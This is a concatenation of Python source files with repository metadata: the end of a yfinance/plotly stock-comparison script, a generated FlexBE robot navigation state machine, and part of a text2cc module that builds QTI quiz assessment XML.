market_cap = str(round(ticker_info['marketCap']/1000000000,2)) + 'B'
longname = ticker_info['longName']
sector = ticker_info['sector']
industry = ticker_info['industry']
country = ticker_info['country']
avg10d_vol = str(round(ticker_info['averageDailyVolume10Day']/1000000,2)) + 'M'
most_recent_vol = str(round(ticker_info['volume']/1000000,2)) + 'M'
try:
beta = round(ticker_info['beta'],2)
except:
beta = ticker_info['beta']
try:
ps_trailing_12mo = round(ticker_info['priceToSalesTrailing12Months'],2)
except:
ps_trailing_12mo = ticker_info['priceToSalesTrailing12Months']
try:
forwardpe = round(ticker_info['forwardPE'],2)
except:
forwardpe = ticker_info['forwardPE']
pegratio = ticker_info['pegRatio']
forwardeps = ticker_info['forwardEps']
trailingeps = ticker_info['trailingEps']
shares_outstanding = str(round(ticker_info['sharesOutstanding']/1000000,2)) + 'M'
shares_short = str(round(ticker_info['sharesShort']/1000000,2)) + 'M'
shares_short_perc_outstanding = str(round(ticker_info['sharesPercentSharesOut']*100,2)) + '%'
floatshares = str(round(ticker_info['floatShares']/1000000,2)) + 'M'
try:
short_perc_float = str(round(ticker_info['shortPercentOfFloat']*100,2)) + '%'
except:
short_perc_float = ticker_info['shortPercentOfFloat']
perc_institutions = str(round(ticker_info['heldPercentInstitutions']*100,2)) + '%'
perc_insiders = str(round(ticker_info['heldPercentInsiders']*100,2)) + '%'
stock_info = [market_cap, longname, sector, industry, country, beta, most_recent_vol, avg10d_vol, ps_trailing_12mo, forwardpe, pegratio, forwardeps, trailingeps,
shares_outstanding, perc_institutions, perc_insiders, shares_short, shares_short_perc_outstanding, floatshares, short_perc_float]
stock_info_df = pd.DataFrame(stock_info, index = ['Market Cap', 'Name', 'Sector', 'Industry', 'Country', 'Beta', 'Day Volume (Most recent)',
'Avg 10D Volume', 'P/S Trailing 12mo', 'Forward P/E', 'PEG Ratio', 'Forward EPS',
'Trailing EPS', 'Shares Outstanding', 'Institutions % of Oustanding',
'Insiders % of Oustanding', 'Shares Short (Prev Mo)', 'Short % of Outstanding (Prev Mo)',
'Shares Float', 'Short % of Float (Prev Mo)'], columns = ['Info'])
print()
display(stock_info_df)
except:
pass
def compare_charts(tickers = [], start = None, end = None, ma = 'yes'):
if len(tickers) <= 1:
raise Exception("Please enter at least two tickers to compare")
def normalize_data(column):
min = column.min()
max = column.max()
# time series normalization
# y will be a column in a dataframe
y = (column - min) / (max - min)
return y
def printmd(string):
display(Markdown(string))
start_end_prices = {}
closing_90_days = []
fig = go.Figure()
for ticker in tickers:
ticker_obj = yf.Ticker(ticker)
ticker_hist = ticker_obj.history(period = 'max')
if start and end:
start_date, end_date = start, end
else:
start_date, end_date = ticker_hist.index[0], ticker_hist.index[-1]
frame = ticker_hist.loc[start_date:end_date].copy()
frame['Norm Close'] = normalize_data(frame['Close'])
closing_prices = frame['Norm Close']
start_end_prices[ticker] = {'start_price': frame.iloc[0]['Close'], 'end_price': frame.iloc[-1]['Close']}
closing_90_days.append(closing_prices.iloc[-90:].to_frame().rename(columns = {'Norm Close': ticker}))
fig.add_trace(go.Scatter(x = closing_prices.index, y = closing_prices, mode = 'lines', name = ticker + ' Norm Close'))
if ma == 'yes':
closing_prices_ma = frame['Norm Close'].rolling(7).mean()
fig.add_trace(go.Scatter(x = closing_prices_ma.index, y = closing_prices_ma, mode = 'lines', name = ticker + '7D Close Moving Average'))
fig.update_layout(title = ', '.join(tickers) + ' Comparison', yaxis_title = 'Norm Price')
fig.update_layout(height = 600,
xaxis=dict(
rangeselector=dict(
buttons=list([
dict(count=7,
label="1w",
step="day",
stepmode="backward"),
dict(count=1,
label="1m",
step="month",
stepmode="backward"),
dict(count=3,
label="3m",
step="month",
stepmode="backward"),
dict(count=6,
label="6m",
step="month",
stepmode="backward"),
dict(count=1,
label="YTD",
step="year",
stepmode="todate"),
dict(count=1,
label="1y",
step="year",
stepmode="backward"),
dict(step="all")
])
),
rangeslider=dict(
visible=True, thickness = 0.1
),
type="date"
)
)
fig.show()
printmd('Given Timeframe:')
for ticker in tickers:
start_price, end_price = start_end_prices[ticker]['start_price'], start_end_prices[ticker]['end_price']
printmd(ticker + " Return: {:.2f}%".format((end_price - start_price)/start_price*100))
if len(tickers) > 2:
concat_closing_90_days = pd.concat(closing_90_days, axis = 1)
print('\n')
printmd("Last 90 Days Close Pearson Correlation Matrix: ")
display(concat_closing_90_days.corr())
fig2 = px.imshow(concat_closing_90_days.corr(), color_continuous_scale = 'blues', title = 'Last 90 Days Close Pearson Correlation Heatmap',
width = 500, height = 400)
fig2.show()
else:
fig2 = go.Figure()
fig2.add_trace(go.Scatter(x = closing_90_days[0].loc[:, tickers[0]], y = closing_90_days[1].loc[:, tickers[1]], mode = 'markers', name = 'Norm Close'))
fig2.update_layout(title = ', '.join(tickers) + ' Last 90 Days Correlation', xaxis_title = tickers[0], yaxis_title = tickers[1], width = 1000, height = 500)
fig2.show()
printmd("Pearson Correlation: " + str(round(closing_90_days[0].loc[:, tickers[0]].corr(closing_90_days[1].loc[:, tickers[1]]),3)))
print()
def plot_buysell_points(ticker, tradesdf, crypto = 'no'):
trade_history = tradesdf[tradesdf['Symbol'] == ticker].reset_index(drop=True)
if crypto == 'yes':
ticker += '-USD'
ticker_obj = yf.Ticker(ticker)
ticker_hist = ticker_obj.history(period = 'max')
if len(ticker_hist) == 0:
return
start_date = (pd.to_datetime(trade_history.loc[0, 'Date']) - timedelta(150)).strftime("%Y-%m-%d")
today_date = date.today().strftime("%Y-%m-%d")
frame = ticker_hist.loc[start_date:today_date]
closing_prices = frame['Close']
fig = go.Figure()
fig.add_trace(go.Scatter(x = closing_prices.index, y = closing_prices, mode = 'lines', name = 'Close'))
for i in range(len(trade_history)):
trade_date = trade_history.loc[i, 'Date']
price = trade_history.loc[i, 'Avg_Price']
quantity = trade_history.loc[i, 'Quantity']
total = trade_history.loc[i, 'Total']
side = trade_history.loc[i, 'Side']
gain = trade_history.loc[i, 'Gain']
perc_gain = trade_history.loc[i, '% Gain']
if side == 'buy':
fig.add_annotation(x = trade_date, y = price, text = f'BB', showarrow = True, arrowhead = 1,
ax = -0.5, ay = -30, arrowsize = 1.5, align = 'left',
hovertext = f'B, P: {price}, Q: {quantity}, T: {total}, D: {trade_date}')
if side == 'sell':
fig.add_annotation(x = trade_date, y = price, text = f'SS', showarrow = True, arrowhead = 1,
ax = 20, ay = -30, arrowsize = 1.5, align = 'right',
hovertext = f'S, P: {price}, Q: {quantity}, T: {total}, D: {trade_date}, G: {gain}, %G: {perc_gain}')
fig.update_layout(title = ticker, yaxis_title = 'Price')
fig.show()
| 2.640625 | 3 |
flexbe_navigation_states/src/flexbe_navigation_states/navigation_sm.py | amsks/generic_flexbe_states | 0 | 5505 | <gh_stars>0
#!/usr/bin/env python
# -*- coding: utf-8 -*-
###########################################################
# WARNING: Generated code! #
# ************************** #
# Manual changes may get lost if file is generated again. #
# Only code inside the [MANUAL] tags will be kept. #
###########################################################
from flexbe_core import Behavior, Autonomy, OperatableStateMachine, ConcurrencyContainer, PriorityContainer, Logger
from flexbe_states.wait_state import WaitState
from flexbe_navigation_states.turn_right_sm import turn_rightSM
from flexbe_states.subscriber_state import SubscriberState
from flexbe_utility_states.MARCO import Carbonara
from flexbe_navigation_states.turn_left_sm import turn_leftSM
from flexbe_navigation_states.go_straight_sm import go_straightSM
from flexbe_navigation_states.obstacle_avoidance_sm import Obstacle_AvoidanceSM
# Additional imports can be added inside the following tags
# [MANUAL_IMPORT]
# [/MANUAL_IMPORT]
'''
Created on Sat Jul 18 2020
@author: TG4
'''
class NavigationSM(Behavior):
'''
Integrated behaviour
'''
def __init__(self):
super(NavigationSM, self).__init__()
self.name = 'Navigation'
# parameters of this behavior
# references to used behaviors
self.add_behavior(turn_rightSM, 'turn_right')
self.add_behavior(turn_leftSM, 'turn_left')
self.add_behavior(go_straightSM, 'go_straight')
self.add_behavior(go_straightSM, 'go_straight_2')
self.add_behavior(go_straightSM, 'go_straight_3')
self.add_behavior(Obstacle_AvoidanceSM, 'Obstacle_Avoidance')
# Additional initialization code can be added inside the following tags
# [MANUAL_INIT]
# [/MANUAL_INIT]
# Behavior comments:
def create(self):
# x:1683 y:419, x:605 y:337
_state_machine = OperatableStateMachine(outcomes=['finished', 'failed'])
# Additional creation code can be added inside the following tags
# [MANUAL_CREATE]
# [/MANUAL_CREATE]
with _state_machine:
# x:58 y:69
OperatableStateMachine.add('w1',
WaitState(wait_time=1),
transitions={'done': 's1'},
autonomy={'done': Autonomy.Off})
# x:1090 y:488
OperatableStateMachine.add('turn_right',
self.use_behavior(turn_rightSM, 'turn_right'),
transitions={'finished': 'w2', 'failed': 'failed'},
autonomy={'finished': Autonomy.Inherit, 'failed': Autonomy.Inherit})
# x:55 y:196
OperatableStateMachine.add('s1',
SubscriberState(topic='/darknet_ros/bounding_boxes', blocking=True, clear=False),
transitions={'received': 'carb1', 'unavailable': 'w1'},
autonomy={'received': Autonomy.Off, 'unavailable': Autonomy.Off},
remapping={'message': 'detected'})
# x:286 y:212
OperatableStateMachine.add('carb1',
Carbonara(),
transitions={'none': 'go_straight', 'Obstacle': 'Obstacle_Avoidance', 'Left': 'go_straight_2', 'Right': 'go_straight_3'},
autonomy={'none': Autonomy.Off, 'Obstacle': Autonomy.Off, 'Left': Autonomy.Off, 'Right': Autonomy.Off},
remapping={'input_value': 'detected', 'Distance': 'Distance'})
# x:1180 y:246
OperatableStateMachine.add('w2',
WaitState(wait_time=1),
transitions={'done': 'w5'},
autonomy={'done': Autonomy.Off})
# x:1161 y:64
OperatableStateMachine.add('w5',
WaitState(wait_time=1),
transitions={'done': 'w1'},
autonomy={'done': Autonomy.Off})
# x:958 y:119
OperatableStateMachine.add('turn_left',
self.use_behavior(turn_leftSM, 'turn_left'),
transitions={'finished': 'w2', 'failed': 'failed'},
autonomy={'finished': Autonomy.Inherit, 'failed': Autonomy.Inherit})
# x:906 y:276
OperatableStateMachine.add('go_straight',
self.use_behavior(go_straightSM, 'go_straight'),
transitions={'finished': 'w2', 'failed': 'failed'},
autonomy={'finished': Autonomy.Inherit, 'failed': Autonomy.Inherit})
# x:679 y:118
OperatableStateMachine.add('go_straight_2',
self.use_behavior(go_straightSM, 'go_straight_2'),
transitions={'finished': 'turn_left', 'failed': 'failed'},
autonomy={'finished': Autonomy.Inherit, 'failed': Autonomy.Inherit})
# x:715 y:484
OperatableStateMachine.add('go_straight_3',
self.use_behavior(go_straightSM, 'go_straight_3'),
transitions={'finished': 'turn_right', 'failed': 'failed'},
autonomy={'finished': Autonomy.Inherit, 'failed': Autonomy.Inherit})
# x:381 y:495
OperatableStateMachine.add('Obstacle_Avoidance',
self.use_behavior(Obstacle_AvoidanceSM, 'Obstacle_Avoidance'),
transitions={'finished': 's1', 'failed': 'failed'},
autonomy={'finished': Autonomy.Inherit, 'failed': Autonomy.Inherit})
return _state_machine
# Private functions can be added inside the following tags
# [MANUAL_FUNC]
# [/MANUAL_FUNC]
| 1.890625 | 2 |
text2cc/xml_assessment.py | dlehman83/text2cc | 1 | 5506 | # -*- coding: utf-8 -*-
#
# Copyright (c) 2021, <NAME>
# Copyright (c) 2020, <NAME>
# All rights reserved.
#
# Licensed under the BSD 3-Clause License:
# http://opensource.org/licenses/BSD-3-Clause
#
from .quiz import Quiz, Question, GroupStart, GroupEnd, TextRegion
BEFORE_ITEMS = '''\
<?xml version="1.0" encoding="UTF-8"?>
<questestinterop xmlns="http://www.imsglobal.org/xsd/ims_qtiasiv1p2" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://www.imsglobal.org/xsd/ims_qtiasiv1p2 http://www.imsglobal.org/profile/cc/ccv1p2/ccv1p2_qtiasiv1p2p1_v1p0.xsd">
<assessment ident="{assessment_identifier}" title="{title}">
<qtimetadata>
<qtimetadatafield>
<fieldlabel>cc_maxattempts</fieldlabel>
<fieldentry>1</fieldentry>
</qtimetadatafield>
<qtimetadatafield>
<fieldlabel>
cc_profile
</fieldlabel>
<fieldentry>
cc.exam.v0p1
</fieldentry>
</qtimetadatafield>
<qtimetadatafield>
<fieldlabel>
qmd_assessmenttype
</fieldlabel>
<fieldentry>
Examination
</fieldentry>
</qtimetadatafield>
</qtimetadata>
<section ident="root_section">
'''
AFTER_ITEMS = '''\
</section>
</assessment>
</questestinterop>
'''
GROUP_START = '''\
<section ident="{ident}" title="{group_title}">
<selection_ordering>
<selection>
<selection_number>{pick}</selection_number>
<selection_extension>
<points_per_item>{points_per_item}</points_per_item>
</selection_extension>
</selection>
</selection_ordering>
'''
GROUP_END = '''\
</section>
'''
TEXT = '''\
<item ident="{ident}" title="{text_title_xml}">
<itemmetadata>
<qtimetadata>
<qtimetadatafield>
<fieldlabel>cc_profile</fieldlabel>
<fieldentry>text_only_question</fieldentry>
</qtimetadatafield>
<qtimetadatafield>
<fieldlabel>points_possible</fieldlabel>
<fieldentry>0</fieldentry>
</qtimetadatafield>
<qtimetadatafield>
<fieldlabel>original_answer_ids</fieldlabel>
<fieldentry></fieldentry>
</qtimetadatafield>
<qtimetadatafield>
<fieldlabel>assessment_question_identifierref</fieldlabel>
<fieldentry>{assessment_question_identifierref}</fieldentry>
</qtimetadatafield>
</qtimetadata>
</itemmetadata>
<presentation>
<material>
<mattext texttype="text/html">{text_html_xml}</mattext>
</material>
</presentation>
</item>
'''
START_ITEM = '''\
<item ident="{question_identifier}" title="{question_title}">
'''
END_ITEM = '''\
</item>
'''
ITEM_METADATA_MCTF_SHORTANS_MULTANS_NUM = '''\
<itemmetadata>
<qtimetadata>
<qtimetadatafield>
<fieldlabel>cc_profile</fieldlabel>
<fieldentry>{question_type}</fieldentry>
</qtimetadatafield>
<qtimetadatafield>
<fieldlabel>points_possible</fieldlabel>
<fieldentry>{points_possible}</fieldentry>
</qtimetadatafield>
<qtimetadatafield>
<fieldlabel>original_answer_ids</fieldlabel>
<fieldentry>{original_answer_ids}</fieldentry>
</qtimetadatafield>
<qtimetadatafield>
<fieldlabel>assessment_question_identifierref</fieldlabel>
<fieldentry>{assessment_question_identifierref}</fieldentry>
</qtimetadatafield>
</qtimetadata>
</itemmetadata>
'''
ITEM_METADATA_ESSAY = ITEM_METADATA_MCTF_SHORTANS_MULTANS_NUM.replace('{original_answer_ids}', '')
ITEM_METADATA_UPLOAD = ITEM_METADATA_ESSAY
ITEM_PRESENTATION_MCTF = '''\
<presentation>
<material>
<mattext texttype="text/html">{question_html_xml}</mattext>
</material>
<response_lid ident="response1" rcardinality="Single">
<render_choice>
{choices}
</render_choice>
</response_lid>
</presentation>
'''
ITEM_PRESENTATION_MCTF_CHOICE = '''\
<response_label ident="{ident}">
<material>
<mattext texttype="text/html">{choice_html_xml}</mattext>
</material>
</response_label>'''
ITEM_PRESENTATION_MULTANS = ITEM_PRESENTATION_MCTF.replace('Single', 'Multiple')
ITEM_PRESENTATION_MULTANS_CHOICE = ITEM_PRESENTATION_MCTF_CHOICE
ITEM_PRESENTATION_SHORTANS = '''\
<presentation>
<material>
<mattext texttype="text/html">{question_html_xml}</mattext>
</material>
<response_str ident="response1" rcardinality="Single">
<render_fib>
<response_label ident="answer1" rshuffle="No"/>
</render_fib>
</response_str>
</presentation>
'''
ITEM_PRESENTATION_ESSAY = '''\
<presentation>
<material>
<mattext texttype="text/html">{question_html_xml}</mattext>
</material>
<response_str ident="response1" rcardinality="Single">
<render_fib>
<response_label ident="answer1" rshuffle="No"/>
</render_fib>
</response_str>
</presentation>
'''
ITEM_PRESENTATION_UPLOAD = '''\
<presentation>
<material>
<mattext texttype="text/html">{question_html_xml}</mattext>
</material>
</presentation>
'''
ITEM_PRESENTATION_NUM = '''\
<presentation>
<material>
<mattext texttype="text/html">{question_html_xml}</mattext>
</material>
<response_str ident="response1" rcardinality="Single">
<render_fib fibtype="Decimal">
<response_label ident="answer1"/>
</render_fib>
</response_str>
</presentation>
'''
ITEM_RESPROCESSING_START = '''\
<resprocessing>
<outcomes>
<decvar maxvalue="100" minvalue="0" varname="SCORE" vartype="Decimal"/>
</outcomes>
'''
ITEM_RESPROCESSING_MCTF_GENERAL_FEEDBACK = '''\
<respcondition continue="Yes">
<conditionvar>
<other/>
</conditionvar>
<displayfeedback feedbacktype="Response" linkrefid="general_fb"/>
</respcondition>
'''
ITEM_RESPROCESSING_MCTF_CHOICE_FEEDBACK = '''\
<respcondition continue="Yes">
<conditionvar>
<varequal respident="response1">{ident}</varequal>
</conditionvar>
<displayfeedback feedbacktype="Response" linkrefid="{ident}_fb"/>
</respcondition>
'''
ITEM_RESPROCESSING_MCTF_SET_CORRECT_WITH_FEEDBACK = '''\
<respcondition continue="No">
<conditionvar>
<varequal respident="response1">{ident}</varequal>
</conditionvar>
<setvar action="Set" varname="SCORE">100</setvar>
<displayfeedback feedbacktype="Response" linkrefid="correct_fb"/>
</respcondition>
'''
ITEM_RESPROCESSING_MCTF_SET_CORRECT_NO_FEEDBACK = '''\
<respcondition continue="No">
<conditionvar>
<varequal respident="response1">{ident}</varequal>
</conditionvar>
<setvar action="Set" varname="SCORE">100</setvar>
</respcondition>
'''
ITEM_RESPROCESSING_MCTF_INCORRECT_FEEDBACK = '''\
<respcondition continue="Yes">
<conditionvar>
<other/>
</conditionvar>
<displayfeedback feedbacktype="Response" linkrefid="general_incorrect_fb"/>
</respcondition>
'''
ITEM_RESPROCESSING_SHORTANS_GENERAL_FEEDBACK = ITEM_RESPROCESSING_MCTF_GENERAL_FEEDBACK
ITEM_RESPROCESSING_SHORTANS_CHOICE_FEEDBACK = '''\
<respcondition continue="Yes">
<conditionvar>
<varequal respident="response1">{answer_xml}</varequal>
</conditionvar>
<displayfeedback feedbacktype="Response" linkrefid="{ident}_fb"/>
</respcondition>
'''
ITEM_RESPROCESSING_SHORTANS_SET_CORRECT_WITH_FEEDBACK = '''\
<respcondition continue="No">
<conditionvar>
{varequal}
</conditionvar>
<setvar action="Set" varname="SCORE">100</setvar>
<displayfeedback feedbacktype="Response" linkrefid="correct_fb"/>
</respcondition>
'''
ITEM_RESPROCESSING_SHORTANS_SET_CORRECT_NO_FEEDBACK = '''\
<respcondition continue="No">
<conditionvar>
{varequal}
</conditionvar>
<setvar action="Set" varname="SCORE">100</setvar>
</respcondition>
'''
ITEM_RESPROCESSING_SHORTANS_SET_CORRECT_VAREQUAL = '''\
<varequal respident="response1">{answer_xml}</varequal>'''
ITEM_RESPROCESSING_SHORTANS_INCORRECT_FEEDBACK = ITEM_RESPROCESSING_MCTF_INCORRECT_FEEDBACK
ITEM_RESPROCESSING_MULTANS_GENERAL_FEEDBACK = ITEM_RESPROCESSING_MCTF_GENERAL_FEEDBACK
ITEM_RESPROCESSING_MULTANS_CHOICE_FEEDBACK = ITEM_RESPROCESSING_MCTF_CHOICE_FEEDBACK
ITEM_RESPROCESSING_MULTANS_SET_CORRECT_WITH_FEEDBACK = '''\
<respcondition continue="No">
<conditionvar>
<and>
{varequal}
</and>
</conditionvar>
<setvar action="Set" varname="SCORE">100</setvar>
<displayfeedback feedbacktype="Response" linkrefid="correct_fb"/>
</respcondition>
'''
ITEM_RESPROCESSING_MULTANS_SET_CORRECT_NO_FEEDBACK = '''\
<respcondition continue="No">
<conditionvar>
<and>
{varequal}
</and>
</conditionvar>
<setvar action="Set" varname="SCORE">100</setvar>
</respcondition>
'''
ITEM_RESPROCESSING_MULTANS_SET_CORRECT_VAREQUAL_CORRECT = '''\
<varequal respident="response1">{ident}</varequal>'''
ITEM_RESPROCESSING_MULTANS_SET_CORRECT_VAREQUAL_INCORRECT = '''\
<not>
<varequal respident="response1">{ident}</varequal>
</not>'''
ITEM_RESPROCESSING_MULTANS_INCORRECT_FEEDBACK = ITEM_RESPROCESSING_MCTF_INCORRECT_FEEDBACK
ITEM_RESPROCESSING_ESSAY_GENERAL_FEEDBACK = ITEM_RESPROCESSING_MCTF_GENERAL_FEEDBACK
ITEM_RESPROCESSING_UPLOAD_GENERAL_FEEDBACK = ITEM_RESPROCESSING_MCTF_GENERAL_FEEDBACK
ITEM_RESPROCESSING_NUM_GENERAL_FEEDBACK = ITEM_RESPROCESSING_MCTF_GENERAL_FEEDBACK
ITEM_RESPROCESSING_NUM_RANGE_SET_CORRECT_WITH_FEEDBACK = '''\
<respcondition continue="No">
<conditionvar>
<vargte respident="response1">{num_min}</vargte>
<varlte respident="response1">{num_max}</varlte>
</conditionvar>
<setvar action="Set" varname="SCORE">100</setvar>
<displayfeedback feedbacktype="Response" linkrefid="correct_fb"/>
</respcondition>
'''
ITEM_RESPROCESSING_NUM_RANGE_SET_CORRECT_NO_FEEDBACK = '''\
<respcondition continue="No">
<conditionvar>
<vargte respident="response1">{num_min}</vargte>
<varlte respident="response1">{num_max}</varlte>
</conditionvar>
<setvar action="Set" varname="SCORE">100</setvar>
</respcondition>
'''
ITEM_RESPROCESSING_NUM_EXACT_SET_CORRECT_WITH_FEEDBACK = '''\
<respcondition continue="No">
<conditionvar>
<or>
<varequal respident="response1">{num_exact}</varequal>
<and>
<vargte respident="response1">{num_min}</vargte>
<varlte respident="response1">{num_max}</varlte>
</and>
</or>
</conditionvar>
<setvar action="Set" varname="SCORE">100</setvar>
<displayfeedback feedbacktype="Response" linkrefid="correct_fb"/>
</respcondition>
'''
ITEM_RESPROCESSING_NUM_EXACT_SET_CORRECT_NO_FEEDBACK = '''\
<respcondition continue="No">
<conditionvar>
<or>
<varequal respident="response1">{num_exact}</varequal>
<and>
<vargte respident="response1">{num_min}</vargte>
<varlte respident="response1">{num_max}</varlte>
</and>
</or>
</conditionvar>
<setvar action="Set" varname="SCORE">100</setvar>
</respcondition>
'''
ITEM_RESPROCESSING_NUM_INCORRECT_FEEDBACK = ITEM_RESPROCESSING_MCTF_INCORRECT_FEEDBACK
ITEM_RESPROCESSING_ESSAY = '''\
<respcondition continue="No">
<conditionvar>
<other/>
</conditionvar>
</respcondition>
'''
ITEM_RESPROCESSING_END = '''\
</resprocessing>
'''
ITEM_FEEDBACK_MCTF_SHORTANS_MULTANS_NUM_GENERAL = '''\
<itemfeedback ident="general_fb">
<flow_mat>
<material>
<mattext texttype="text/html">{feedback}</mattext>
</material>
</flow_mat>
</itemfeedback>
'''
ITEM_FEEDBACK_MCTF_SHORTANS_MULTANS_NUM_CORRECT = '''\
<itemfeedback ident="correct_fb">
<flow_mat>
<material>
<mattext texttype="text/html">{feedback}</mattext>
</material>
</flow_mat>
</itemfeedback>
'''
ITEM_FEEDBACK_MCTF_SHORTANS_MULTANS_NUM_INCORRECT = '''\
<itemfeedback ident="general_incorrect_fb">
<flow_mat>
<material>
<mattext texttype="text/html">{feedback}</mattext>
</material>
</flow_mat>
</itemfeedback>
'''
ITEM_FEEDBACK_MCTF_SHORTANS_MULTANS_NUM_INDIVIDUAL = '''\
<itemfeedback ident="{ident}_fb">
<flow_mat>
<material>
<mattext texttype="text/html">{feedback}</mattext>
</material>
</flow_mat>
</itemfeedback>
'''
def assessment(*, quiz: Quiz, assessment_identifier: str, title_xml: str) -> str:
'''
Generate assessment XML from Quiz.
'''
xml = []
xml.append(BEFORE_ITEMS.format(assessment_identifier=assessment_identifier,
title=title_xml))
for question_or_delim in quiz.questions_and_delims:
if isinstance(question_or_delim, TextRegion):
xml.append(TEXT.format(ident=f'text2qti_text_{question_or_delim.id}',
text_title_xml=question_or_delim.title_xml,
assessment_question_identifierref=f'text2qti_question_ref_{question_or_delim.id}',
text_html_xml=question_or_delim.text_html_xml))
continue
if isinstance(question_or_delim, GroupStart):
xml.append(GROUP_START.format(ident=f'text2qti_group_{question_or_delim.group.id}',
group_title=question_or_delim.group.title_xml,
pick=question_or_delim.group.pick,
points_per_item=question_or_delim.group.points_per_question))
continue
if isinstance(question_or_delim, GroupEnd):
xml.append(GROUP_END)
continue
if not isinstance(question_or_delim, Question):
raise TypeError
question = question_or_delim
xml.append(START_ITEM.format(question_identifier=f'text2qti_question_{question.id}',
question_title=question.title_xml))
if question.type in ('true_false_question', 'multiple_choice_question',
'short_answer_question', 'multiple_answers_question'):
item_metadata = ITEM_METADATA_MCTF_SHORTANS_MULTANS_NUM
original_answer_ids = ','.join(f'text2qti_choice_{c.id}' for c in question.choices)
elif question.type == 'numerical_question':
item_metadata = ITEM_METADATA_MCTF_SHORTANS_MULTANS_NUM
original_answer_ids = f'text2qti_numerical_{question.id}'
elif question.type == 'essay_question':
item_metadata = ITEM_METADATA_ESSAY
original_answer_ids = f'text2qti_essay_{question.id}'
elif question.type == 'file_upload_question':
item_metadata = ITEM_METADATA_UPLOAD
original_answer_ids = f'text2qti_upload_{question.id}'
else:
raise ValueError
#Type Change for Schoology CC Import
if question.type == 'multiple_choice_question':
typechange = 'cc.multiple_choice.v0p1'
elif question.type == 'true_false_question':
typechange = 'cc.true_false.v0p1'
elif question.type == 'short_answer_question':
typechange = 'cc.fib.v0p1'
elif question.type == 'multiple_answers_question':
typechange = 'cc.multiple_response.v0p1'
elif question.type == 'essay_question':
typechange = 'cc.essay.v0p1'
else:
typechange = question.type
xml.append(item_metadata.format(question_type=typechange,
points_possible=question.points_possible,
original_answer_ids=original_answer_ids,
assessment_question_identifierref=f'text2qti_question_ref_{question.id}'))
if question.type in ('true_false_question', 'multiple_choice_question', 'multiple_answers_question'):
if question.type in ('true_false_question', 'multiple_choice_question'):
item_presentation_choice = ITEM_PRESENTATION_MCTF_CHOICE
item_presentation = ITEM_PRESENTATION_MCTF
elif question.type == 'multiple_answers_question':
item_presentation_choice = ITEM_PRESENTATION_MULTANS_CHOICE
item_presentation = ITEM_PRESENTATION_MULTANS
else:
raise ValueError
choices = '\n'.join(item_presentation_choice.format(ident=f'text2qti_choice_{c.id}', choice_html_xml=c.choice_html_xml)
for c in question.choices)
xml.append(item_presentation.format(question_html_xml=question.question_html_xml, choices=choices))
elif question.type == 'short_answer_question':
xml.append(ITEM_PRESENTATION_SHORTANS.format(question_html_xml=question.question_html_xml))
elif question.type == 'numerical_question':
xml.append(ITEM_PRESENTATION_NUM.format(question_html_xml=question.question_html_xml))
elif question.type == 'essay_question':
xml.append(ITEM_PRESENTATION_ESSAY.format(question_html_xml=question.question_html_xml))
elif question.type == 'file_upload_question':
xml.append(ITEM_PRESENTATION_UPLOAD.format(question_html_xml=question.question_html_xml))
else:
raise ValueError
if question.type in ('true_false_question', 'multiple_choice_question'):
correct_choice = None
for choice in question.choices:
if choice.correct:
correct_choice = choice
break
if correct_choice is None:
raise TypeError
resprocessing = []
resprocessing.append(ITEM_RESPROCESSING_START)
if question.feedback_raw is not None:
resprocessing.append(ITEM_RESPROCESSING_MCTF_GENERAL_FEEDBACK)
for choice in question.choices:
if choice.feedback_raw is not None:
resprocessing.append(ITEM_RESPROCESSING_MCTF_CHOICE_FEEDBACK.format(ident=f'text2qti_choice_{choice.id}'))
if question.correct_feedback_raw is not None:
resprocessing.append(ITEM_RESPROCESSING_MCTF_SET_CORRECT_WITH_FEEDBACK.format(ident=f'text2qti_choice_{correct_choice.id}'))
else:
resprocessing.append(ITEM_RESPROCESSING_MCTF_SET_CORRECT_NO_FEEDBACK.format(ident=f'text2qti_choice_{correct_choice.id}'))
if question.incorrect_feedback_raw is not None:
resprocessing.append(ITEM_RESPROCESSING_MCTF_INCORRECT_FEEDBACK)
resprocessing.append(ITEM_RESPROCESSING_END)
xml.extend(resprocessing)
elif question.type == 'short_answer_question':
resprocessing = []
resprocessing.append(ITEM_RESPROCESSING_START)
if question.feedback_raw is not None:
resprocessing.append(ITEM_RESPROCESSING_SHORTANS_GENERAL_FEEDBACK)
for choice in question.choices:
if choice.feedback_raw is not None:
resprocessing.append(ITEM_RESPROCESSING_SHORTANS_CHOICE_FEEDBACK.format(ident=f'text2qti_choice_{choice.id}', answer_xml=choice.choice_xml))
varequal = []
for choice in question.choices:
varequal.append(ITEM_RESPROCESSING_SHORTANS_SET_CORRECT_VAREQUAL.format(answer_xml=choice.choice_xml))
if question.correct_feedback_raw is not None:
resprocessing.append(ITEM_RESPROCESSING_SHORTANS_SET_CORRECT_WITH_FEEDBACK.format(varequal='\n'.join(varequal)))
else:
resprocessing.append(ITEM_RESPROCESSING_SHORTANS_SET_CORRECT_NO_FEEDBACK.format(varequal='\n'.join(varequal)))
if question.incorrect_feedback_raw is not None:
resprocessing.append(ITEM_RESPROCESSING_SHORTANS_INCORRECT_FEEDBACK)
resprocessing.append(ITEM_RESPROCESSING_END)
xml.extend(resprocessing)
elif question.type == 'multiple_answers_question':
resprocessing = []
resprocessing.append(ITEM_RESPROCESSING_START)
if question.feedback_raw is not None:
resprocessing.append(ITEM_RESPROCESSING_MULTANS_GENERAL_FEEDBACK)
for choice in question.choices:
if choice.feedback_raw is not None:
resprocessing.append(ITEM_RESPROCESSING_MULTANS_CHOICE_FEEDBACK.format(ident=f'text2qti_choice_{choice.id}'))
varequal = []
for choice in question.choices:
if choice.correct:
varequal.append(ITEM_RESPROCESSING_MULTANS_SET_CORRECT_VAREQUAL_CORRECT.format(ident=f'text2qti_choice_{choice.id}'))
else:
varequal.append(ITEM_RESPROCESSING_MULTANS_SET_CORRECT_VAREQUAL_INCORRECT.format(ident=f'text2qti_choice_{choice.id}'))
if question.correct_feedback_raw is not None:
resprocessing.append(ITEM_RESPROCESSING_MULTANS_SET_CORRECT_WITH_FEEDBACK.format(varequal='\n'.join(varequal)))
else:
resprocessing.append(ITEM_RESPROCESSING_MULTANS_SET_CORRECT_NO_FEEDBACK.format(varequal='\n'.join(varequal)))
if question.incorrect_feedback_raw is not None:
resprocessing.append(ITEM_RESPROCESSING_MULTANS_INCORRECT_FEEDBACK)
resprocessing.append(ITEM_RESPROCESSING_END)
xml.extend(resprocessing)
elif question.type == 'numerical_question':
xml.append(ITEM_RESPROCESSING_START)
if question.feedback_raw is not None:
